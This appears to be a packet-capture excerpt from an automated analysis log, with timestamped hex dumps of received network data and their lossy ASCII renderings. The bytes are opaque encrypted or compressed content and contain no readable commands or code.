                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30760INData Raw: c9 0a bd 2b 84 45 68 85 57 1c 32 d1 55 1b ff 62 9d 37 af 42 a3 09 66 e0 1d 46 d3 74 02 da ea e4 ca c6 8d f4 17 c4 21 2a 74 13 97 9d 99 56 75 e0 a9 ec cd 65 c1 08 99 d5 00 06 f3 6e c4 09 b9 f9 b2 e1 6b 4d 0d 52 e3 c6 7e 59 d0 14 d6 8f b7 5b e9 f3 26 5d 39 f8 49 58 30 e2 b3 82 9c 0c 02 f0 48 27 1b 8b f2 7a 6c b0 67 6d e0 fe 9e 1b d9 53 55 51 0c 60 93 eb c2 eb 2b 0b e0 fb d7 88 11 2f 18 33 50 1e b6 7b 52 ca 7e aa ca e1 99 fd 3f 3d ed bc 32 37 92 1c 59 9f a5 73 3c ce ae 2f 3e 04 cc 7e cb d2 43 5b a9 8c 53 64 33 10 a1 2e e7 69 b6 85 05 50 c0 b3 eb 87 ca 93 9a 30 ee 9f 86 d8 a4 5c 48 fd 59 d4 a9 be 90 1d a3 a4 25 51 99 7b fa 03 22 27 31 e4 9c a9 ff f7 8e 89 ad 48 79 3d bd 11 ce c1 cd 72 06 5b 73 5e 70 f5 5d ce ba 95 76 64 75 eb ff 68 85 8c 5e c6 3d b5 0a 2a 7a
                                                                                                                                                                                                                                    Data Ascii: +EhW2Ub7BfFt!*tVuenkMR~Y[&]9IX0H'zlgmSUQ`+/3P{R~?=27Ys</>~C[Sd3.iP0\HY%Q{"'1Hy=r[s^p]vduh^=*z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30776INData Raw: 73 70 a4 73 b7 d8 5d 26 c3 a1 72 6b 05 1b 74 f3 90 c8 df 83 5f 58 e7 61 68 9c 58 58 45 e7 21 bd 73 8f 74 2a e7 a9 eb 03 64 00 ac 3e 86 48 fe 2e a6 85 67 32 0e 3c a9 66 d3 d4 7c b3 86 b8 b3 21 53 73 b4 53 0b 02 5d d0 97 e0 b8 f5 67 78 b1 f5 72 a5 8d 16 9c c5 1c 0f 16 5a 14 ca 3a 0d 30 ad 6f 0c d8 d1 66 7f ad ee 8d 0a 30 00 49 80 2b 32 85 8c 79 f6 7e 6d 62 7e fb 2c ca b2 a2 53 3d 24 6e ae d1 8d 9c fc a0 32 a7 dc c9 4c f7 5e ca 9c 41 3a 51 a3 6b a9 d9 29 6b 44 b3 33 38 18 47 2a 07 ed dc 24 8b ad e4 0d 13 4c 04 e3 f6 f4 6e 5d 9b 1d 9f d1 82 61 c4 a7 00 63 71 a1 93 3b 96 1e 93 ca f1 a7 2d f9 ea fd d5 4d 37 e9 55 a2 64 f9 5b 6b 79 2a 56 04 78 69 fc 42 78 88 dd 14 51 a3 da 61 fd 82 9b 8b 3c 1a ff fd 32 5d d4 21 f6 a8 48 34 0a e0 d2 90 81 81 b2 11 e3 f9 93 5d e7
                                                                                                                                                                                                                                    Data Ascii: sps]&rkt_XahXXE!st*d>H.g2<f|!SsS]gxrZ:0of0I+2y~mb~,S=$n2L^A:Qk)kD38G*$Ln]acq;-M7Ud[ky*VxiBxQa<2]!H4]
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30792INData Raw: 05 6e b1 0d c0 ca 59 dc b7 8e f5 7d c8 b0 a7 a4 18 c8 26 a5 6a d8 bf f1 9b 37 de 90 80 d7 a7 09 95 53 8b fa 9d b5 9a f4 96 dc 0c 57 06 9a 09 e1 a0 6e 93 3b b7 ea 4c 56 a0 27 be 3f 8a b9 f8 ec 7f f7 d3 9a fc 2d 6f 67 52 af 30 c1 48 13 e9 d2 f9 75 03 39 8b fb 23 74 da f0 d4 ca bf 09 aa d6 65 2c 42 d9 29 1b 80 c6 e9 61 71 77 82 ea 3d 94 6d 7a 66 28 83 ab 09 7d 7d 01 4e 6e f2 a7 b7 38 0e ea 8f c8 12 dd f0 9a a8 d4 23 d7 56 9f fd a9 a5 73 65 7a bd 73 e5 11 4f 7c de ae 2a 0b 97 b8 ed 64 23 4c e6 69 19 43 d5 99 10 ac 85 f0 42 c7 db fe 81 89 7a c5 57 b3 8f 47 0c f6 6c c1 cb 92 d9 0d c3 dc e3 78 bb c2 4d da 67 be 55 93 ae c1 bf 10 24 02 aa 80 4b b5 19 f3 40 86 b2 24 5c 60 51 ca aa ad 7b e1 a1 8f 88 db c3 dd ba b6 71 37 b4 ce d6 c5 cc b3 72 f8 35 57 e4 e5 86 41 c0
                                                                                                                                                                                                                                    Data Ascii: nY}&j7SWn;LV'?-ogR0Hu9#te,B)aqw=mzf(}}Nn8#VsezsO|*d#LiCBzWGlxMgU$K@$\`Q{q7r5WA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30808INData Raw: 8c 2f 8a 2b 25 0f b9 b2 4e 1a 02 7f dd 14 68 ef 83 f1 21 70 34 04 02 ca 20 58 8b e2 94 d0 44 e3 b0 59 32 01 66 cb 75 37 82 9a e3 c8 19 3f 38 c2 96 69 dd 39 3c 30 e4 bf 98 c7 c9 71 05 f8 e1 c6 b5 04 82 c6 2f b0 36 71 02 3f ed b2 f8 e7 ed 7a 70 d9 1c b1 f7 80 6e 27 6a 4c cf a7 ad ea a7 91 bc 45 e2 26 16 58 01 91 7b e9 74 1a 7a 39 9c 13 28 c8 1a 12 0b 01 46 a7 a9 0f 80 69 26 de c3 f7 41 df 5f 56 14 8e 50 e8 09 59 1e 6f ef 76 c0 a2 b5 9f de 8e 31 9b 27 1d d9 95 c2 dc ae d7 f2 05 bf 27 da d1 e8 0b c3 25 2a 87 c0 c1 67 67 a0 f8 03 bb 7d 7c fd 91 c0 74 03 d1 3b be c2 a5 0d ee 08 04 f0 bf c4 c2 70 c2 91 6e 9d c1 e3 7c 21 b5 c2 bc 8e 56 ee fe 28 d6 26 a1 c3 da de fd e4 5d 20 17 1a 4f 43 2d 0f 8e be 2c 76 9f df e8 4c 25 c3 77 45 5d fe 70 16 9a f0 08 b4 cd ac 92 b0
                                                                                                                                                                                                                                    Data Ascii: /+%Nh!p4 XDY2fu7?8i9<0q/6q?zpn'jLE&X{tz9(Fi&A_VPYov1''%*gg}|t;pn|!V(&] OC-,vL%wE]p
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30824INData Raw: 68 3c 3e ee 8f de 9e 2d 85 54 cd 55 a9 9f 5f 29 3f ba 7a a7 a5 e7 48 49 bf 3a 0f 4f c5 7c 16 20 28 7f fd ba 61 bb 1f c7 dd a7 e8 82 75 c2 f7 85 3a 34 d4 ea fd 3f 9f 72 43 ed 9e 0c 9a ca ee c3 de 37 78 e5 e4 37 74 c0 da bc f6 e7 dc 35 7f 0a 08 20 e9 7a c0 24 eb ef 93 48 8c 5d bf 8e 1c 90 f8 f7 78 b4 74 7b 9c c8 d7 14 4b b5 49 c1 d3 ae 23 2c 11 72 36 9e fa 87 63 5e 73 b9 62 66 a6 9b b5 b6 c6 37 e0 c0 f1 37 5e e3 49 0a ed f1 96 be eb f2 88 64 6d 04 a3 ba ae f2 1a 91 11 41 de 3e dd c9 93 08 9b fb 27 63 27 10 ac c9 50 d4 08 23 86 de 2c 0a 41 7a cb 9e fd 55 b5 e2 25 4e 11 bc d4 82 78 c0 a2 f6 1b 05 56 e5 28 92 c7 6f 58 a9 86 94 a0 ad 7a 69 91 c2 a4 8f 51 f5 0e 3e 7b d7 67 9e c9 b7 01 b7 60 5b 9c fc 2c 46 53 d0 2d 8e 35 d0 18 0d 20 34 23 6d 1b d3 a7 a3 44 ab 33
                                                                                                                                                                                                                                    Data Ascii: h<>-TU_)?zHI:O| (au:4?rC7x7t5 z$H]xt{KI#,r6c^sbf77^IdmA>'c'P#,AzU%NxV(oXziQ>{g`[,FS-5 4#mD3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30840INData Raw: 09 d7 f0 3f 6a 67 a2 60 a9 fc 43 8e 46 44 bb 0e a4 85 1f 8a 49 17 23 57 00 34 77 52 67 f9 09 20 0b 82 34 13 a1 41 58 7a 62 18 75 87 74 e9 af d4 61 a0 3a 6b 63 19 94 8f af 3a 77 ff d5 0e 65 8c c5 ed df fc 4c ec a4 7d 98 ba 7e 0b 7f 51 7a ea ba 8d 9c 09 46 7b e3 02 e5 53 56 51 31 0c 94 31 3b ff ef 6b f4 da e0 30 7d 14 3b dc f0 bc 5d 15 d4 bb 3b 67 68 a3 41 0c 3d e6 cf 58 3d f9 7b 05 14 08 38 9f ea 40 6d 9b b2 2f b1 54 f1 f1 45 ae 7e 1a bb b6 cc 8c 37 e3 9c b6 77 44 3a 06 47 9f 75 48 13 0f 73 36 09 5d 20 fc 35 a0 e3 cb d2 08 c5 40 c4 11 94 3f da 71 75 15 8f 6f 5d 8b bd cd 2c 56 28 20 30 63 7d f8 56 d2 49 0f c7 df 90 39 61 3b fe d6 63 a7 6e 44 34 25 a1 f5 52 10 40 ed 06 23 98 ce 5b 28 cf e4 9c 8a c4 d4 65 97 ad b1 b2 a0 6d f4 5b 25 40 b1 d5 1e e0 fb 87 c2 cd
                                                                                                                                                                                                                                    Data Ascii: ?jg`CFDI#W4wRg 4AXzbuta:kc:weL}~QzF{SVQ11;k0};];ghA=X={8@m/TE~7wD:GuHs6] 5@?quo],V( 0c}VI9a;cnD4%R@#[(em[%@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30856INData Raw: 32 58 e3 e3 3d ef 7a f5 f6 18 3f a1 20 7c 30 bd d4 1b 92 66 3c 9a 93 35 77 b1 de d0 d2 26 1f 5c 0b c2 63 83 18 8e 66 61 92 33 e5 44 7a bd 6d 69 b0 b5 33 6f 40 7b 16 17 aa a6 f2 2c 70 44 c5 21 83 21 96 76 0f da 92 3f 44 8b 9f 71 1a 8b 3f 8a ed 4e 3a bb cf b1 83 ff 44 17 dc a4 3a 6c 08 4d fe 32 51 9f 77 e2 94 19 b4 27 c3 d1 61 40 aa 99 58 04 c0 4b 33 06 c3 65 08 73 e3 88 6c 1a 66 a8 59 f3 8a 74 0a 28 ed 80 aa 7e c4 ed f7 13 c2 fc 64 5b f8 24 4d 39 bb 4b e6 92 40 7c c4 e4 1e 57 8d 5e 02 e2 3f 3c c1 ae b4 dd 6e e7 2b 4a 73 82 c3 c1 71 4f 1e 34 7e 5e 78 67 2d 39 a3 64 69 fa 54 5f 6c f0 ad 3e 0c 67 1c d8 7e 4c 07 83 de 7c 47 88 a8 d2 d1 06 27 84 80 42 36 38 8b 1e 6f 00 33 b3 9a 95 42 e2 36 37 6f 54 66 6e 8f 38 06 d6 63 d9 cd eb 63 a7 33 8d 9c 38 06 8e 47 89 e8
                                                                                                                                                                                                                                    Data Ascii: 2X=z? |0f<5w&\cfa3Dzmi3o@{,pD!!v?Dq?N:D:lM2Qw'a@XK3eslfYt(~d[$M9K@|W^?<n+JsqO4~^xg-9diT_l>g~L|G'B68o3B67oTfn8cc38G
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30872INData Raw: 59 b1 89 26 15 40 6b 4a 14 84 12 23 63 f9 2f cd 88 22 23 d4 96 f1 4c bf 82 77 50 9d c2 05 7a bf b5 a6 3c e1 e3 ac cd 5f 92 2e fd b0 97 53 e7 f1 1b 37 9a 6a bd 4f 5e 4f 79 88 df 47 df 2f a9 93 60 12 b1 0c e8 87 cf b4 af 61 c8 0e 36 0d 6f f2 52 ee 55 e9 9d da 43 37 5d e7 6f 7a 68 a8 c7 0c 2a b3 5b 6c 23 c0 c4 4d db b6 cc 7f 5d 92 03 52 b4 a1 e3 f7 f3 6a 65 69 05 2c 0f 50 08 83 44 54 f9 29 33 44 93 87 6d 86 2f 60 1b 03 f2 09 f6 94 c5 dc b4 4c 05 39 99 21 22 05 03 67 ce a8 57 f7 13 99 db 58 9f 10 74 15 fc 4b 39 5d c2 d3 16 3e 91 b7 75 a4 b3 2d 4c 43 b0 cb 21 33 77 28 6e e6 84 a2 d0 7a 89 60 c8 18 90 a3 d9 d0 9c 99 82 d9 61 2d c8 ab 48 c6 18 b5 2e 2d 24 52 12 b2 e6 c8 5f 2d df 96 a2 fc 4d 13 1f 3e 5d b2 45 80 17 13 4e d7 ed a6 d2 2e c3 1c 60 bd 5f 89 8d 10 3e
                                                                                                                                                                                                                                    Data Ascii: Y&@kJ#c/"#LwPz<_.S7jO^OyG/`a6oRUC7]ozh*[l#M]Rjei,PDT)3Dm/`L9!"gWXtK9]>u-LC!3w(nz`a-H.-$R_-M>]EN.`_>
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30888INData Raw: 45 e0 71 d0 50 03 12 df 16 9e 0f 85 d3 90 96 10 99 36 2d 97 3b 7c 64 f9 d5 35 cb 0b 5d 28 5d a4 cd 76 c4 41 d5 42 25 6e b0 3d 8d 5b ff 80 25 15 9d bd fa cc 3b 1b a9 ec db 9f 20 de c4 f6 1d d9 59 5e 0e a2 0a 57 4d ff ef 98 54 de b4 79 32 d3 2d 18 b4 ac d5 ec 08 49 84 65 f1 01 48 90 95 29 04 76 08 99 d8 0e cf 93 aa 33 96 a0 fb ef 9d 8b 8d 14 66 a4 7d 67 12 2e 64 46 76 df 27 8d a4 74 4a 57 82 dc d6 6d 79 84 a9 3b 81 fd 2c 14 87 a3 ce 02 9a 11 24 dc 5a 27 9b 8d d3 a8 53 89 0f 1a 8c 9f 5a fd c1 39 b0 da 8d 39 b6 33 a5 2d 6d d0 91 c5 9b a0 d2 83 b5 e8 97 6d 16 0a 04 96 97 79 50 57 a1 53 50 dc b7 32 81 bf 28 d4 55 b5 0a 81 3d f8 58 30 d6 9f b1 e0 25 22 a9 63 40 5d 93 e6 f8 61 be 88 4f a6 6e 62 fb 9f 5f ae b8 fa 40 f4 63 90 1c 97 5e d4 f8 42 f9 bc 39 a4 9c 4b eb
                                                                                                                                                                                                                                    Data Ascii: EqP6-;|d5](]vAB%n=[%; Y^WMTy2-IeH)v3f}g.dFv'tJWmy;,$Z'SZ993-mmyPWSP2(U=X0%"c@]aOnb_@c^B9K
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30904INData Raw: 96 32 3a 3f 19 05 cb e2 0a 26 e1 b6 95 db b8 31 02 10 ba 37 44 a0 72 f0 21 e8 6e 7c b2 b7 95 9b 4c 6b 06 23 2f 05 1b 38 6c ed 48 2e 02 34 20 2b af d6 37 4f 71 31 57 33 26 08 13 59 cf 80 9c d1 28 f8 bf 7d 4a af b6 5f cc fd 8e 09 a1 3e 02 51 3d 99 bc 62 2f 71 44 ee db 90 d4 35 a7 ea 31 6c d1 d3 67 80 7b c0 13 f5 a3 5e bb 13 34 e0 6b f5 64 47 44 37 03 94 0d 30 bf db 8e 56 f5 91 00 a4 53 64 a3 e9 fb 61 c1 53 7d 04 61 5b 5d 94 3a 7b 02 07 0a 8d c3 84 d0 32 c4 34 04 ac 0f b2 de b3 5e e6 28 3f 3c 3e 0d 63 f9 8a 38 4f 3e 46 12 50 c2 19 9b 42 30 57 f1 c8 23 f7 98 6a 57 a6 74 6f 3e f1 0e 7c 77 61 89 9c bc 93 96 e3 16 ee 96 64 f5 66 19 fc 60 5c de c8 75 db cb 1c 28 8d 61 57 33 69 3b 75 e9 a8 c0 96 e1 fe f6 31 8a cc 74 cc a9 f6 b1 21 16 e6 b8 83 9e 3d 28 c2 dd 18 16
                                                                                                                                                                                                                                    Data Ascii: 2:?&17Dr!n|Lk#/8lH.4 +7Oq1W3&Y(}J_>Q=b/qD51lg{^4kdGD70VSdaS}a[]:{24^(?<>c8O>FPB0W#jWto>|wadf`\u(aW3i;u1t!=(
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30920INData Raw: 1f b1 02 a9 17 8f 10 e3 95 6f 89 3a 3d 2b 04 ed f6 8f 24 13 16 4b 40 7c f2 e9 33 93 8e 8c d6 e3 59 b9 c7 5a 46 d3 d2 ef 4d bd 9b 5a be 1a 94 66 93 9b cf 53 7d dd 7d 30 da 92 ee 60 2d 5f c1 9c c2 d0 bd 46 33 71 75 2c 2c 5d 36 6a 69 60 c9 db 06 38 1e 1b cc a3 a8 2f c3 67 bd 82 dc 0e f7 bd eb de 84 4e b1 51 ef db dc a9 ea 08 34 c1 4e 08 ff f5 e8 b3 a2 0f d6 6f 59 4d 82 54 32 89 56 b3 64 7e 88 9f 47 c4 e7 6c b9 f1 87 44 58 b3 39 bf 05 7a 9d e5 88 1a 28 f0 f8 25 1d cb 15 c3 47 6c 06 a1 5a fa 03 0e 88 6d 7c 90 07 cf 9c 24 49 6e 76 d0 24 59 5a cc 19 2b a5 34 fb 1c e3 61 45 3d cf 56 4d 47 16 0c fb 20 3c 4b 2e e5 e3 84 eb 5e b6 af 71 62 85 da f8 7d 93 df 39 b4 8d b8 f3 71 81 05 97 8f d5 7a 1c 11 4a 1c 37 15 62 05 32 f1 9f 8e 8a 69 87 93 f2 ba 41 07 63 37 97 d8 ca
                                                                                                                                                                                                                                    Data Ascii: o:=+$K@|3YZFMZfS}}0`-_F3qu,,]6ji`8/gNQ4NoYMT2Vd~GlDX9z(%GlZm|$Inv$YZ+4aE=VMG <K.^qb}9qzJ7b2iAc7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30936INData Raw: 00 f6 78 20 bc 38 92 28 50 29 47 68 6c 87 94 01 8e 98 c5 3c 5d d1 b5 d2 0e 36 41 51 cc b9 22 6a 47 43 0b c0 bc d1 56 10 36 ec eb 58 64 c1 35 f3 93 78 70 5b e3 5b e2 25 df b9 46 06 89 09 94 fb 4b ce 8c 9c 5c e2 82 2c 12 5c 17 1f f1 55 92 8c 33 12 91 4e 43 52 fc ce 03 31 5b fe 17 01 b0 07 d4 39 35 ee f4 5b a1 16 ac 43 d1 c8 f5 23 51 b7 c9 0e 5d 47 09 37 b3 a0 cc 9d 66 08 ac 87 7c d6 e5 4d ab eb 50 2e 78 80 af c7 8d 04 aa 45 71 62 ff 83 b3 aa 69 b0 85 83 a1 06 6d f9 07 56 c1 d0 00 a6 ef b6 aa d3 74 b5 43 38 0f 78 d1 56 40 d6 4e f5 b3 06 46 4e 10 bb e3 d0 2f ec 81 e3 39 74 94 59 8a d4 5a fe bd 3e 46 11 eb c9 87 94 52 3a ef b3 a9 75 c0 c9 b4 7a 4c 4f 03 54 e6 aa f5 56 57 97 cd cf 07 c5 f6 73 68 3a d7 20 21 16 6a ec e8 3a dc 7b ff 87 9a bb d0 5f 92 e0 86 0c 55
                                                                                                                                                                                                                                    Data Ascii: x 8(P)Ghl<]6AQ"jGCV6Xd5xp[[%FK\,\U3NCR1[95[C#Q]G7f|MP.xEqbimVtC8xV@NFN/9tYZ>FR:uzLOTVWsh: !j:{_U
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30952INData Raw: 18 b3 8b 2d ec 06 ff f3 c5 86 90 cd 30 04 f9 17 96 39 98 b8 1b 76 e0 02 8a 5a 1c 48 bc 88 71 36 fe 58 4c 62 6f ce 18 64 93 63 4e 96 f4 1e bd c7 5e cf 2b 24 5c c1 d9 bd 11 fc 0e cd 61 8a 23 0c 0c 2a 21 11 6f 12 77 4b 1b 66 79 d6 24 3e 73 84 d3 f0 8a 99 b1 9c ef 38 b9 d9 4d f1 6d 55 98 19 87 34 1a 52 d3 8f 16 63 05 b7 4e f1 4b f5 aa 57 83 be 9a fc 07 9b 12 64 f0 f7 e9 59 b8 f2 13 46 04 4b 43 f8 28 7c 83 30 0f cb 25 ba 21 77 61 f1 57 63 c6 7c 19 ca dd 73 76 68 68 ae b5 d1 d3 8f a9 c5 f2 8d 2e 7b 2c a5 3f 40 b9 57 ff 92 28 6c b3 9d eb 02 72 bb 9c 37 e8 69 30 cd db a8 c8 ea 1d b8 25 76 51 9b 99 3d fd 7c dd 54 67 71 05 fa 1f 65 3d 94 b1 3d b9 fa 1a 76 d6 f2 09 a5 82 7c 11 da 2e 4c a0 44 2c ce 17 5e 3f 36 b9 54 05 f5 6f 96 bb a3 45 9c 7d d3 c6 87 71 0f 7b d0 2e
                                                                                                                                                                                                                                    Data Ascii: -09vZHq6XLbodcN^+$\a#*!owKfy$>s8MmU4RcNKWdYFKC(|0%!waWc|svhh.{,?@W(lr7i0%vQ=|Tgqe==v|.LD,^?6ToE}q{.
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30968INData Raw: 8e f2 b9 ce 7c 08 59 5a b4 02 70 93 27 69 46 e1 3a d6 0f b5 a7 fc 07 22 f1 4c e9 99 8d bd 74 15 0c dd 0f f7 06 b0 42 39 70 c6 cb ea 88 a6 af 5b c1 9a 02 86 53 66 8b ca 94 bf 82 c2 d4 2a 77 58 0c b2 8f e3 d1 f0 02 29 2f 95 2f a3 78 6e 99 a3 00 32 5e c2 9e 72 e2 5a 47 71 a6 df b3 28 72 f3 c6 c3 f1 00 5a 60 31 81 00 a0 4d a9 6a a9 d3 4c f7 80 1c 0b ec 48 32 28 1c d1 6c a4 12 71 65 7e 27 bf 7f 8a bb eb 95 3a c9 03 62 75 1a 69 a2 a3 e4 94 71 57 4c 7b 30 d4 df c9 3b ce b5 a1 b2 4e 88 91 a1 26 4b 6b 52 b8 39 0d 93 35 39 db ea a7 47 6f 09 49 20 9f ae 1d ba 01 f7 f3 a7 e4 7f f0 fb 3b 92 e8 96 40 cf 18 45 65 df db fb 9f fa 31 86 4b 37 4c e6 ca 46 6a 7b cd e8 cc 58 07 b4 05 59 96 3d a3 86 fd 2e 34 ee 34 ea 6d 1f f8 a4 e1 64 74 7c 94 4d 3b 36 b5 fd fe 95 99 bb 8e a3
                                                                                                                                                                                                                                    Data Ascii: |YZp'iF:"LtB9p[Sf*wX)//xn2^rZGq(rZ`1MjLH2(lqe~':buiqWL{0;N&KkR959GoI ;@Ee1K7LFj{XY=.44mdt|M;6
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30984INData Raw: 73 3e ce 27 ad 5f 8c 4e 2d 94 7f 1a 4a 62 25 43 7e bc 67 72 9f 53 38 35 a4 48 0c 18 6b bf de 7c 2b d8 0a 69 b9 64 c1 41 12 cc a1 98 34 b1 e4 d2 02 d1 ed 77 7f df dd 68 3d b8 81 50 32 6f ac ae fe c5 68 00 cf 7f df 2a 18 95 4c db 7d f6 22 32 fb 21 75 c9 5a 5a 01 c2 fc 9e 17 cc fa 5f ea 93 9e e0 de 56 49 0f e6 95 a5 1d 2c 60 3a 02 5b 1b 4b 37 f2 3b c8 36 70 7c c9 16 4f 07 37 ac e2 bb c4 5a 73 9b c7 97 4a 97 f3 75 37 1d 97 6b cb 28 f4 51 3f a3 53 6c 07 86 4b 51 c3 3f d0 dd 74 93 25 b8 4e ae d5 aa d4 b7 14 b4 b9 5d 38 3a fd 65 b8 df f8 1f 35 34 4b a2 f8 c0 9c e9 9e b0 05 42 76 7c f2 cf 5b 11 c4 71 6b 32 de de b1 e5 15 ab 69 58 26 0b 53 a4 64 89 07 3c f2 cf 7d 35 63 02 fc 08 22 9e ee 75 47 a5 31 af dc 17 c8 39 47 d3 54 1b b8 f6 6a 6b c5 82 1a ba 28 ea 29 3f c6
                                                                                                                                                                                                                                    Data Ascii: s>'_N-Jb%C~grS85Hk|+idA4wh=P2oh*L}"2!uZZ_VI,`:[K7;6p|O7ZsJu7k(Q?SlKQ?t%N]8:e54KBv|[qk2iX&Sd<}5c"uG19GTjk()?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31000INData Raw: 41 20 cb da ed e2 57 04 7d de 31 3f 7e 66 1d ce 8a 0f c6 1c ac b1 ec 26 a3 a8 98 b0 44 1c f3 41 cc 39 00 3d 39 b7 4c 9e 6e 2f 3f 23 e9 04 e3 2e eb 72 23 ea d8 d1 71 43 17 55 fd be 6e ca 21 94 71 fe 4a 9c 7b b9 a5 95 4b 93 65 f9 a1 08 e6 b3 b6 9d 0a a5 c4 8a a6 06 b7 42 a3 16 d7 e8 b0 f8 fc 20 28 46 6f 40 a0 4d 19 6f dd 95 98 7f 73 91 45 b6 e5 7c 20 91 d4 06 fe 05 cb 52 58 33 63 8e 39 c6 1d 1c 06 1f 1e de bd b8 23 09 f6 1d 59 3f f4 55 c5 a9 48 97 d1 64 10 44 19 dd 38 40 78 37 0a 74 a2 21 c1 75 e5 61 ff 12 d9 f1 a6 35 35 69 f0 e6 08 ee 44 ce c7 fa 7e 2e c3 39 39 57 cd c6 17 e9 b4 c9 a5 d0 bf fd a5 97 58 1d 9a 61 b0 3a ab 20 a0 db 2e d7 f7 a0 52 6e 21 5e d8 34 9c 3d e7 cc 74 ba 00 96 57 88 a1 c2 b0 f1 61 af f1 d7 c4 03 01 5f 15 59 0b d2 4a f8 79 21 fa 97 15
                                                                                                                                                                                                                                    Data Ascii: A W}1?~f&DA9=9Ln/?#.r#qCUn!qJ{KeB (Fo@MosE| RX3c9#Y?UHdD8@x7t!ua55iD~.99WXa: .Rn!^4=tWa_YJy!
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31016INData Raw: fb 85 e8 39 02 be d8 e7 23 f4 29 f7 be 0c 8d 5a df 75 25 1a b7 d6 ce cb 4e 47 d0 6a 30 5e 64 5f 2e 2e 2f 51 37 e3 99 3a a5 a3 f7 5b 55 c8 f5 96 c7 5a e0 b6 1e 0a 89 80 17 75 5a 4a f1 50 8d 7c 7b 80 ca 1b ba a4 05 ae a6 e7 38 b7 d7 41 1b fa 08 f6 f4 f6 97 b9 7a 49 16 2d f7 5d 60 a7 a1 66 89 eb 65 98 ee 0f 1b f4 b7 44 ab d2 5d 14 76 24 4a 1e e1 4c 71 f3 24 01 c6 e8 1e 40 1d 15 4b d2 e8 3e 5a 28 43 69 75 f9 9d 20 47 83 d3 b3 c8 13 69 99 2b 19 9b 01 42 d1 34 28 27 ad 2c 55 3e 31 a0 d6 ac 45 1b 85 1a df ce fe ef 4e b9 d9 7c 59 10 9b 28 78 ee a2 e3 81 56 87 9a e5 bb 75 7d 46 99 d7 4e 55 9b 79 e4 b8 99 12 60 2b 3c ce 7b 83 f0 8c 02 57 8f 8e 15 7f b4 b4 9f ca da 94 e1 28 7a 58 05 d9 13 07 fe ae d5 0d 0a cc f3 a4 eb 89 eb 7b 5a f2 31 2a 5a 33 76 4c 81 63 35 f8 db
                                                                                                                                                                                                                                    Data Ascii: 9#)Zu%NGj0^d_../Q7:[UZuZJP|{8AzI-]`feD]v$JLq$@K>Z(Ciu Gi+B4(',U>1EN|Y(xVu}FNUy`+<{W(zX{Z1*Z3vLc5
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31032INData Raw: d3 fc f1 f4 a6 7a f2 66 4f 00 15 d3 1b 23 d6 59 89 ae 61 28 85 f6 08 89 44 85 b2 8a 70 e1 ed 9a 8b 47 5f 74 22 33 ac ef 42 fb 29 0a af 05 0b 67 95 b3 f6 41 38 53 da b6 16 6e 19 3a 9d e8 60 b9 ae 40 12 4c 93 e8 68 90 2c 9a b1 c0 b4 4a db 2e 7e 35 2e 59 65 1e 77 84 a2 14 37 2d 85 74 da 14 19 2a c1 52 ff 17 14 b9 e5 d0 35 35 65 86 9d c8 5a 62 5b a9 fe c4 78 b6 32 fa 78 55 4e 96 d9 0e ab 11 75 88 8f 65 9c a1 b4 90 43 65 92 80 b3 d6 82 dd 09 da 2e c9 f0 c6 3c 04 78 cf 51 f8 2a 98 60 dc 62 b8 29 c1 92 77 06 95 12 a6 0a 51 9e 28 27 bd 64 e4 cb e2 63 e2 e5 f6 6a 3d 99 b9 fb 5b d3 0f 2a 61 5c 78 f4 4d 36 49 0a c9 36 bb 3c fc ab 99 4b 95 ca ed f8 f6 74 0a aa 30 4e d1 7b b7 e9 90 58 b8 75 ba 9b 01 4d 2e c5 71 27 42 39 25 6b d9 1b 77 78 b9 2c 03 87 01 a7 5e a7 b6 98
                                                                                                                                                                                                                                    Data Ascii: zfO#Ya(DpG_t"3B)gA8Sn:`@Lh,J.~5.Yew7-t*R55eZb[x2xUNueCe.<xQ*`b)wQ('dcj=[*a\xM6I6<Kt0N{XuM.q'B9%kwx,^
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31048INData Raw: f9 3f cd bd 1e a7 a1 7e 0f d8 ab 7f 80 ef 3c 2d c9 8e f5 6e 13 1a 86 52 af ee 3e eb 61 1b 0e 4e 44 a8 7a 6a 27 2d 41 cd 7d a1 77 7b 70 89 bb f7 c8 57 3a 39 03 8b ac b2 16 0c 35 d1 af 1d ab ad 74 f5 48 c0 34 fa 1a 4e 65 7d 84 de a5 aa 9c 9f 00 53 d9 06 8e c0 15 fa b6 fa 53 89 be 97 00 25 6f 6b e0 c0 9d a9 0d e9 e4 de 72 2c bd f8 fe 96 8a b9 f8 5e b5 39 22 e9 0e 3d 67 a7 b8 31 cb 32 8e a9 2c e4 ed 9e 10 4f 2e 3d 8f 72 dc 7e 3e 69 85 e8 73 ec a7 da 6c 2e 11 da 44 92 a4 3f 6d 8f 4d 37 86 30 01 af 58 67 45 a2 58 12 37 9b 40 00 53 1a 35 43 e1 7c 43 95 17 b4 84 1b 50 11 93 9e bd cc d6 79 4d bf fa 75 b9 d7 ef e3 5a 53 0f 79 eb 48 fd 8c ac 7c c0 84 a9 9c bf ad fb ca 63 48 7d 91 a3 42 c3 7f 49 03 3f 00 b4 17 ef 21 fe d1 99 23 5e b1 09 0c 20 59 73 52 f7 e4 b4 de 4b
                                                                                                                                                                                                                                    Data Ascii: ?~<-nR>aNDzj'-A}w{pW:95tH4Ne}SS%okr,^9"=g12,O.=r~>isl.D?mM70XgEX7@S5C|CPyMuZSyH|cH}BI?!#^ YsRK
